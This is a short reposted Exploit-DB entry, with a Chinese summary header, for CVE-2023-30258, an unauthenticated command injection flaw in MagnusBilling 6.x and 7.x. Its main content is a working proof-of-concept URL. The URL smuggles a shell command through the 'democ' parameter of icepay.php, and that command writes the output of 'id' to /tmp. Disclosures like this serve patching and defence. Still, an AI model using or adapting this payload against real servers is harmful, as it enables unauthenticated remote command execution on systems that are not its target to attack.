[webapps] MagnusSolution magnusbilling 7.3.0 - Command Injection
MagnusBilling 6.x和7.x版本存在未认证远程命令注入漏洞(CVE-2023-30258),攻击者可通过构造特定URL执行系统命令。 2025-4-11 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:4 收藏
MagnusBilling 6.x和7.x版本存在未认证远程命令注入漏洞(CVE-2023-30258),攻击者可通过构造特定URL执行系统命令。 2025-4-11 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:4 收藏
# Exploit Title: [MagnusBilling 6.x and 7.x Unauthenticated Remote Command Injection Vulnerability]
# Date: [2024-10-26]
# Exploit Author: [CodeSecLab]
# Vendor Homepage: [https://github.com/magnussolution/magnusbilling7]
# Software Link: [https://github.com/magnussolution/magnusbilling7]
# Version: [7.3.0]
# Tested on: [Centos]
# CVE : [CVE-2023-30258]
PoC:
# PoC URL for Command Injection
http://magnusbilling/lib/icepay/icepay.php?democ=testfile; id > /tmp/injected.txt
Result: This PoC attempts to inject the id command.
[Replace Your Domain Name]
文章来源: https://www.exploit-db.com/exploits/52170
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh